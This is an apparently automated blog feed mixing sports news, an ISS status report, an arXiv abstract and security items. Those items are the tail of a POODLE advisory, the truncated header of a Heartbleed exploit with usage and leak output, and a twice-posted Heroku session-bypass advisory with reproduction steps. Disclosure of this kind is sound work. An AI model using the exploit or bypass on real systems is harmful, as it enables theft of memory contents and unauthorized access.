0.9.8 users should upgrade to 0.9.8zc. Both clients and servers need to support TLS_FALLBACK_SCSV to prevent downgrade attacks. Other SSL 3.0 implementations are most likely also affected by POODLE. Contact your vendor for details. Additional vendor information may be available in the National Vulnerability Database (NVD) entry for CVE-2014-3566 or in CERT Vulnerability Note VU#577193.[7] Vulnerable TLS implementations need to be updated. CVE ID assignments and vendor information are also available in the NVD.[8] Exploit /* * Heartbleed OpenSSL information leak exploit * ========================================================= * This exploit uses OpenSSL to create an encrypted connection * and trigger the heartbleed leak. The leaked information is * returned within encrypted SSL packets and is then decrypted * and wrote to a file to annoy IDS/forensics. The exploit can * set heartbeat payload length arbitrarily or use two preset * values for NULL and MAX length. The vulnerability occurs due * to bounds checking not being performed on a heap value which * is user supplied and returned to the user as part of DTLS/TLS * heartbeat SSL extension. All versions of OpenSSL 1.0.1 to * 1.0.1f are known affected. You must run this against a target * which is linked to a vulnerable OpenSSL library using DTLS/TLS. * This exploit leaks upto 65535 bytes of remote heap each request * and can be run in a loop until the connected peer ends connection. * The data leaked contains 16 bytes of random padding at the end. * The exploit can be used against a connecting client or server, * it can also send pre_cmd's to plain-text services to establish * an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients * will often forcefully close the connection during large leak * requests so try to lower your payload request size. * * Compiled on ArchLinux x86_64 gcc 4.8.2 20140206 w/OpenSSL 1.0.1g * * E.g. * $ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed * $ ./heartbleed -s 192.168.11.23 -p 443 -f out -t 1 * [ heartbleed OpenSSL information leak exploit * [ ============================================================= * [ connecting to 192.168.11.23 443/tcp * [ connected to 192.168.11.23 443/tcp * [ <3 <3 <3 heart bleed <3 <3 <3 * [ heartbeat returned type=24 length=16408 * [ decrypting SSL packet * [ heartbleed leaked length=65535 * [ final record type=24, length=16384 * [ wrote 16381 bytes of heap to file 'out' * [ heartbeat returned type=24 length=16408 * [ decrypting SSL packet * [ final record type=24, length=16384 * [ wrote 16384 bytes of heap to file 'out' * [ heartbeat returned type=24 length=16408 * [ decrypting SSL packet * [ final record type=24, length=16384 * [ wrote 16384 bytes of heap to file 'out' * [ heartbeat returned type=24 length=16408 * [ decrypting SSL packet * [ final record type=24, length=16384 * [ wrote 16384 bytes of heap to file 'out' * [ heartbeat returned type=24 length=42 * [ decrypting SSL packet * [ final record type=24, length=18 * [ wrote 18 bytes of heap to file 'out' * [ done. * $ ls -al out * -rw

Source: Gmail -> IFTTT-> Blogger

NPR Journalist, Citing Anonymous 'List'

This morning, NPR journalist Diane Rehm had Bernie Sanders on her radio show to discuss a number of issues, including his stances social security, abortion, immigration, the Affordable Care ...

from Google Alert - anonymous http://ift.tt/1KWJIxU
via IFTTT

Beasley on US roster for CONCACAF Gold Cup

MIAMI BEACH, Fla. (AP) Houston Dynamo defender DaMarcus Beasley is among 35 players on the Americans' preliminary roster for next month's CONCACAF Gold Cup despite announcing his retirement from the U.S. national team in December.

from FOX Sports Digital http://ift.tt/1KqxAHn
via IFTTT

I have a new follower on Twitter


John Sonmez
Want to know the best way to increase your salary or hourly rate? http://t.co/5hjINCbt04
Tampa, FL
http://t.co/0J779E3OFj
Following: 16103 - Followers: 23098

June 10, 2015 at 03:26PM via Twitter http://twitter.com/jsonmez

Swansea signs Ghana forward Andre Ayew

SWANSEA, Wales (AP) Ghana forward Andre Ayew has joined Premier League club Swansea on a four-year deal, subject to international clearance.

from FOX Sports Digital http://ift.tt/1BZemBB
via IFTTT

Williams, Diskerud, Agudelo start for US against Germany

COLOGNE, Germany (AP) U.S. coach Jurgen Klinsmann changed three players for Wednesday night's exhibition against his native Germany, starting Danny Williams, Mix Diskerud and Juan Agudelo in place of Brek Shea, Kyle Beckerman and Alfredo Morales.

from FOX Sports Digital http://ift.tt/1KWtk06
via IFTTT

Swiss attorney general seizes evidence from FIFA offices

BERN, Switzerland (AP) The Swiss attorney-general's office says it has seized more evidence from FIFA headquarters for its investigation into the 2018 and 2022 World Cup bidding contests.

from FOX Sports Digital http://ift.tt/1B2JaGI
via IFTTT

Fantasy MLB: Red Sox 2B Dustin Pedroia 15-for-32 (.469 BA) in his career against Orioles SP Wei-Yin Chen (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

ISS Daily Summary Report – 06/09/15

ISS Attitude Control Disturbance:  ISS experienced unexplained torque around 15:27 GMT in the roll axis.  The attitude control system experienced a large number of desats with a continued increase in attitude error.  SARJs were safed and attitude control was handed over to RS thrusters. Preliminary indications seem to point to an approximate 38-second inadvertent 41S thruster firing following a scheduled Kurs checkout in preparation for 41S undocking.  MCC-M performed realtime commanding to stop the thruster firing.  ISS attitude control has been handed back over to the USOS and the ISS is in a stable attitude.  All ISS and Soyuz systems are operating nominally at this time.  Human Research Program (HRP) Collections: Kelly and Cristoforetti continued their collections today with Kelly performing a blood draw to support the Biochemical Profile, Cardio Ox, and Twins Study experiments.  The blood collected was inserted into Minus Eighty Degree Celsius Laboratory Freezer for ISS (MELFI).  Both Kelly and Cristoforetti performed saliva collections for Microbiome and Salivary Markers, and Kelly collected for Twins Study.  Defining the Relation Between Biomarkers of Oxidative and Inflammatory Stress and Atherosclerosis Risk in Astronauts During and After Long-duration Spaceflight (Cardio Ox): Kelly, with Cristoforetti as the Crew Medical Officer (CMO) and remote guidance support from the ground, performed the Flight Day 60 (FD60) ultrasound scans for Cardio Ox followed by blood pressure measurements and logging results. The objective of Cardio Ox is to determine whether biological markers of oxidative and inflammatory stress are elevated during and after space flight and whether this results in an increased, long-term risk of atherosclerosis in astronauts. Crew members provide blood and urine samples to assess biomarkers before launch, three sessions while in space, and again post-flight. Ultrasound scans of the carotid and brachial arteries will be obtained at the same time points, as well as through 5 years after landing as an indicator of cardiovascular health. Extravehicular Mobility Unit (EMU) Return To Service (RTS): Following last week’s EMU 3010 Fan Pump Separator (FPS) replacement, Virts performed a checkout of EMU 3010 today, initial results of the checkout were nominal. Crew Quarters (CQ) Deck Cleaning: In preparation for her departure from the ISS, Cristoforetti cleaned her CQ including intake and exhaust ducts, fans and airflow sensors. Space Station Remote Manipulator System (SSRMS) Operations:  Robotics Ground Controllers maneuvered the SSRMS to grapple the Node 2 Power and Data Grapple Fixture (PDGF).  The SSRMS base was then changed to Node 2, and the Lab PDGF was released.  The SSRMS cameras were then used to perform a survey of the external configuration of the Russian Segment.  Finally, the SSRMS was moved to a park position.  MSS performance was nominal.  Today’s Planned Activities All activities were completed unless otherwise noted. TWIN – Saliva Sample Collection PARODONT-2. Activities with Microbial Control and Mouthwash sets HRF Blood Draw and Stow Prep TWIN – Saliva Sample Collection HRF – Sample MELFI Insertion HRF Blood Draw HRF Blood Sample Collection (operator) HRF Refrigerated Centrifuge Configuration Verification of anti-virus scan results on Auxiliary Computer System (ВКС) laptops EMU Post-FPS R&R Tool Stowage HRF – Blood Sample Collection Closeout Ops PROBOY. Activity with RSЕ1 Station laptop. PROBOY. Activity with Penetration Simulator. HRF. Sample MELFI Insertion USND2 – Hardware Activation CARDOX – Preparation Steps and Hardware Setup EMU 3010 Return To Service (RTS) – Part 1 CARDOX – Scan FENIX. Transfer of Bioecologiya Containers to Soyuz 715 EXPOSE-R БСПН (Payload Server) data download to RSS1 Laptop ТК 715 Return Stowage CARDOX – Blood Pressure Operations Crew Quarter Cleaning HRF Blood Collection Hardware Stowage PROBOY. Copy and Downlink Data USND2 – Hardware Deactivation WRS Water Sample Analysis WHC Fill [Deferred] OTKLIK. Hardware Check CALCIUM. Photograph, Process and Downlink Photos LBNP Exercise (FINAL) EMU 3010 Return To Service (RTS), Part 2 WHC Fill [Deferred] Verification of ИП-1 Flow Sensor Position EMU 3010 Return To Service (RTS), Part 3 Water Recovery System (WRS). WPA Waste Water Tank Offload into CWC. Start Crew prep for departure Sanitary-Hygiene Status Monitoring / r/g 9032 ALGOMETRIA. Experiment Ops / r/g 9039 TOCA Data Recording Teardown of Chibis-M components. Private Medical Conference Handhold Experiment Platform (HXP) Photo, Part 3 Crew prep for departure Photography of БСК-1 (А457). Water Recovery System (WRS). Terminate WPA Waste Water Tank Offload into CWC EMU 3010 Return To Service (RTS), Part 4 Microbial Sample Collection Removal of ЛКТ (ТА251МБ) and ROM from ТК 715 БО СОЖ Maintenance IMS Delta File Prep TWIN – Preparation for urine sampling Preventive maintenance of MRM1 АСП-О hatch sealing mechanisms and Soyuz 715 Hatch (MRM1) Perform a bag level audit of the PMM1P3 to determine contents at this location Air sampling using АК-1М sampler in SM, FGB ИПД Air Sampling for Ammonia in SM HRF – Hardware Setup CONTROL. Switching Indicator-ISS P/L measuring modes WRS – Recycle Tank Fill Cognition – Experiment Ops COGN – Experiment Ops and Questionnaire Completed Task List Items None Ground Activities All activities were completed unless otherwise noted. EMU Return To Service ops SSRMS walkoff to N2 Three-Day Look Ahead: Wednesday, 06/10: Crew Quarters starboard cleaning, Twin Studies, Change of Command ceremony, crew departure prep Thursday, 06/11: 41S undock/landing, Sprint Portable Pulmonary Function setup, Twin Studies Friday, 06/12: Sprint VO2 ops, Radiation Dosimetry QUICK ISS Status – Environmental Control Group:                               Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) On [СКВ] 2 – SM Air Conditioner System (“SKV2”) Off Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Shutdown Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Process Urine Processing Assembly (UPA) Process Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up  

from ISS On-Orbit Status Report http://ift.tt/1GeBzDI
via IFTTT

Self Organizing Maps Whose Topologies Can Be Learned With Adaptive Binary Search Trees Using Conditional Rotations. (arXiv:1506.02750v1 [cs.NE])

Numerous variants of Self-Organizing Maps (SOMs) have been proposed in the literature, including those which also possess an underlying structure, and in some cases, this structure itself can be defined by the user Although the concepts of growing the SOM and updating it have been studied, the whole issue of using a self-organizing Adaptive Data Structure (ADS) to further enhance the properties of the underlying SOM, has been unexplored. In an earlier work, we impose an arbitrary, user-defined, tree-like topology onto the codebooks, which consequently enforced a neighborhood phenomenon and the so-called tree-based Bubble of Activity. In this paper, we consider how the underlying tree itself can be rendered dynamic and adaptively transformed. To do this, we present methods by which a SOM with an underlying Binary Search Tree (BST) structure can be adaptively re-structured using Conditional Rotations (CONROT). These rotations on the nodes of the tree are local, can be done in constant time, and performed so as to decrease the Weighted Path Length (WPL) of the entire tree. In doing this, we introduce the pioneering concept referred to as Neural Promotion, where neurons gain prominence in the Neural Network (NN) as their significance increases. We are not aware of any research which deals with the issue of Neural Promotion. The advantages of such a scheme is that the user need not be aware of any of the topological peculiarities of the stochastic data distribution. Rather, the algorithm, referred to as the TTOSOM with Conditional Rotations (TTOCONROT), converges in such a manner that the neurons are ultimately placed in the input space so as to represent its stochastic distribution, and additionally, the neighborhood properties of the neurons suit the best BST that represents the data. These properties have been confirmed by our experimental results on a variety of data sets.



from cs.AI updates on arXiv.org http://ift.tt/1Mmx2kb
via IFTTT

Swiss Justice Dept: 1 of 7 arrested in FIFA case seeks bail

BERN, Switzerland (AP) Switzerland's Justice Department says one of the seven soccer officials arrested in Zurich appealed for bail during the extradition process.

from FOX Sports Digital http://ift.tt/1QLYrx2
via IFTTT

Messi, Neymar try not to be upstaged at Copa America

SANTIAGO, Chile (AP) Lionel Messi and Neymar aren't used to being upstaged.

from FOX Sports Digital http://ift.tt/1GsdESF
via IFTTT

US, Mali, Serbia, Senegal advance to U20 quarterfinals

WELLINGTON, New Zealand (AP) Goalkeepers became heroes as the United States beat Colombia 1-0 and Senegal beat Ukraine 3-1 on penalties in a dramatic opening to the knockout rounds of the Under-20 World Cup on Wednesday.

from FOX Sports Digital http://ift.tt/1QLYpW6
via IFTTT

Report: Lazio president Lotito investigated for extortion

ROME (AP) Lazio president Claudio Lotito's home and offices were raided by authorities on Wednesday, and he's reportedly under investigation for attempted extortion.

from FOX Sports Digital http://ift.tt/1GsdESz
via IFTTT

FIFA postpones start of 2026 World Cup bidding amid turmoil

SAMARA, Russia (AP) FIFA has suspended the 2026 World Cup bidding process amid a widening corruption scandal implicating previous bid contests.

from FOX Sports Digital http://ift.tt/1GsdGKm
via IFTTT

Mali stuns Ghana, Serbia beats Hungary in U20 playoffs

WELLINGTON, New Zealand (AP) The knockout rounds of the Under-20 World Cup opened with a major upset as Mali stunned Ghana 3-0 while 10-man Serbia beat Hungary 2-1 in extra time on Wednesday.

from FOX Sports Digital http://ift.tt/1GsdGKg
via IFTTT

UEFA chief Platini meets with French President Hollande

PARIS (AP) UEFA President Michel Platini met with French President Francois Hollande on Wednesday amid speculation that he will run for the FIFA presidency when Sepp Blatter follows through with his resignation.

from FOX Sports Digital http://ift.tt/1QLYppa
via IFTTT

Newcastle releases Carver, set to announce new manager

NEWCASTLE, England (AP) Newcastle released John Carver from its coaching staff on Wednesday, paving the way for a new manager at the northeast club following a turbulent season in the English Premier League.

from FOX Sports Digital http://ift.tt/1QLYpp4
via IFTTT

Grandma J's Thanks Anonymous Vandal After 'Busiest Week' Ever

HUMBOLDT PARK — The owner of a restaurant vandalized with anti-gentrification demands last week wants to thank the anonymous tagger: The last ...

from Google Alert - anonymous http://ift.tt/1Gs8Mgi
via IFTTT

BBC News Magazine on Twitter: "Overeaters Anonymous is just one of many groups to follow ...

Overeaters Anonymous is just one of many groups to follow Alcoholics ... @BBCNewsMagazine @BBCWorld I need to attend Awesome Anonymous.

from Google Alert - anonymous https://www.google.com/url?rct=j&sa=t&url=https://twitter.com/BBCNewsMagazine/status/608277428306345984/photo/1&ct=ga&cd=CAIyGjgxMzAxNTQ0ZWE3M2NhMmQ6Y29tOmVuOlVT&usg=AFQjCNE9B9-P_vhKgK3x-zt0Bmcn5zFueQ
via IFTTT

[FD] Heroku Bug Bounty #2 - (API) Re Auth Session Bypass Vulnerability

Document Title: =============== Heroku Bug Bounty #2 - (API) Re Auth Session Bypass Vulnerability References (Source): ==================== http://ift.tt/1dZCVcy Video: http://ift.tt/1QkIyTD Vulnerability Magazine: http://ift.tt/1dsz1Ij Release Date: ============= 2015-06-09 Vulnerability Laboratory ID (VL-ID): ==================================== 1323 Common Vulnerability Scoring System: ==================================== 6.1 Product & Service Introduction: =============================== Heroku provides you with all the tools you need to iterate quickly, and adopt the right technologies for your project. Build modern, maintainable apps and instantly extend them with functionality from hundreds of cloud services providers without worrying about infrastructure. Build. Deploy. Scale. Heroku brings them together in an experience built and designed for developers. Scale your application by moving a slider and upgrade your database in a few simple steps. Whether your growth happens over the year or overnight, you can grow on demand to capture opportunity. Heroku (pronounced her-OH-koo) is a cloud application platform – a new way of building and deploying web apps. Our service lets app developers spend their time on their application code, not managing servers, deployment, ongoing operations, or scaling. Heroku was founded in 2007 by Orion Henry, James Lindenbaum, and Adam Wiggins. (Copy of the Vendor Homepage: http://ift.tt/1knQSw2 ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research team discovered a application-side session validation vulnerability in the official Heroku API and web-application. Vulnerability Disclosure Timeline: ================================== 2014-09-19: Researcher Notification & Coordination (Benjamin Kunz Mejri) 2014-09-20: Vendor Notification (Heroku Security Team - Bug Bounty Program) 2015-03-11: Vendor Response/Feedback (Heroku Security Team - Bug Bounty Program) 2015-06-08: Vendor Fix/Patch Notification (Heroku Developer Team) 2015-06-09: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Heroku Product: Heroku Dashboard - Web Application (API) 2014 Q3 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ An application-side re-auth session bypass vulnerability has been discovered in the official heroku API & web-application service. The vulnerability allows an attacker to request unauthorized information without the second forced re authentication module. The heroku web-service provides to all web services an expire session function that disallows to visit the page without re authentication. The dataclips page session of the editor and the postgres service allows to add for example new context. If the session expires in the main heroku web-service the user will be forced to login again. During the tests we releaved that the session of the dataclip service and editor is available even if the re-authentication service is still running. If the local attacker changes the path manually to request directly the stored context in the profile (like shown in video) he is able to bypass the security mechanism to add or request the database name. The session validation mechnism needs to provoke a refresh of the progres datasheet page or the dataclips add through editor to prevent unauthorized access after a session has been expired during the usage of the heroku service. The security risk of the re-auth session bypass vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 6.1. Exploitation of the vulnerability requires a local low privilege heroku application user account without user interaction. Successful exploitation of the vulnerability results in the evade and bypass of the re-authentication mechanism. Proof of Concept (PoC): ======================= The local re auth bypass vulnerability can be exploited by local attackers with low privilege web-application user account or by remote attackers without privlege web-application account and high user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the re-auth bypass vulnerability ... 1. Register a webpage account at the official heroku website 2. Provoke the re-auth function that pops up after several profile interaction during the time after the session expired 3. When the session is expired to do not press the re-auth function button that popup stable to all service 4. Switch back to the postgres.heroku service and add dataclips or own databases even if the session is expired to all other modules and sites Note: Even if all session are expired the user is able to request the database and the dataclips in the service without authorization 5. Successful reproduce of the session vulnerability! Video Demonstration The video demonstrates the vulnerability in the re-auth function of the heroku service which affects only the heroku service with the dataclips and databases. The session expired values also needs to be recognized in the database service and the site validation request to prevent access without re-auth to heroku itself. Exception Message: -Your session has expired --Your current session has expired or become inactive and has been terminated.

Source: Gmail -> IFTTT-> Blogger

[FD] Heroku Bug Bounty #2 - (API) Re Auth Session Bypass Vulnerability

Document Title: =============== Heroku Bug Bounty #2 - (API) Re Auth Session Bypass Vulnerability References (Source): ==================== http://ift.tt/1dZCVcy Video: http://ift.tt/1QkIyTD Vulnerability Magazine: http://ift.tt/1dsz1Ij Release Date: ============= 2015-06-09 Vulnerability Laboratory ID (VL-ID): ==================================== 1323 Common Vulnerability Scoring System: ==================================== 6.1 Product & Service Introduction: =============================== Heroku provides you with all the tools you need to iterate quickly, and adopt the right technologies for your project. Build modern, maintainable apps and instantly extend them with functionality from hundreds of cloud services providers without worrying about infrastructure. Build. Deploy. Scale. Heroku brings them together in an experience built and designed for developers. Scale your application by moving a slider and upgrade your database in a few simple steps. Whether your growth happens over the year or overnight, you can grow on demand to capture opportunity. Heroku (pronounced her-OH-koo) is a cloud application platform – a new way of building and deploying web apps. Our service lets app developers spend their time on their application code, not managing servers, deployment, ongoing operations, or scaling. Heroku was founded in 2007 by Orion Henry, James Lindenbaum, and Adam Wiggins. (Copy of the Vendor Homepage: http://ift.tt/1knQSw2 ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research team discovered a application-side session validation vulnerability in the official Heroku API and web-application. Vulnerability Disclosure Timeline: ================================== 2014-09-19: Researcher Notification & Coordination (Benjamin Kunz Mejri) 2014-09-20: Vendor Notification (Heroku Security Team - Bug Bounty Program) 2015-03-11: Vendor Response/Feedback (Heroku Security Team - Bug Bounty Program) 2015-06-08: Vendor Fix/Patch Notification (Heroku Developer Team) 2015-06-09: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Heroku Product: Heroku Dashboard - Web Application (API) 2014 Q3 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ An application-side re-auth session bypass vulnerability has been discovered in the official heroku API & web-application service. The vulnerability allows an attacker to request unauthorized information without the second forced re authentication module. The heroku web-service provides to all web services an expire session function that disallows to visit the page without re authentication. The dataclips page session of the editor and the postgres service allows to add for example new context. If the session expires in the main heroku web-service the user will be forced to login again. During the tests we releaved that the session of the dataclip service and editor is available even if the re-authentication service is still running. If the local attacker changes the path manually to request directly the stored context in the profile (like shown in video) he is able to bypass the security mechanism to add or request the database name. The session validation mechnism needs to provoke a refresh of the progres datasheet page or the dataclips add through editor to prevent unauthorized access after a session has been expired during the usage of the heroku service. The security risk of the re-auth session bypass vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 6.1. Exploitation of the vulnerability requires a local low privilege heroku application user account without user interaction. Successful exploitation of the vulnerability results in the evade and bypass of the re-authentication mechanism. Proof of Concept (PoC): ======================= The local re auth bypass vulnerability can be exploited by local attackers with low privilege web-application user account or by remote attackers without privlege web-application account and high user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the re-auth bypass vulnerability ... 1. Register a webpage account at the official heroku website 2. Provoke the re-auth function that pops up after several profile interaction during the time after the session expired 3. When the session is expired to do not press the re-auth function button that popup stable to all service 4. Switch back to the postgres.heroku service and add dataclips or own databases even if the session is expired to all other modules and sites Note: Even if all session are expired the user is able to request the database and the dataclips in the service without authorization 5. Successful reproduce of the session vulnerability! Video Demonstration The video demonstrates the vulnerability in the re-auth function of the heroku service which affects only the heroku service with the dataclips and databases. The session expired values also needs to be recognized in the database service and the site validation request to prevent access without re-auth to heroku itself. Exception Message: -Your session has expired --Your current session has expired or become inactive and has been terminated.

Source: Gmail -> IFTTT-> Blogger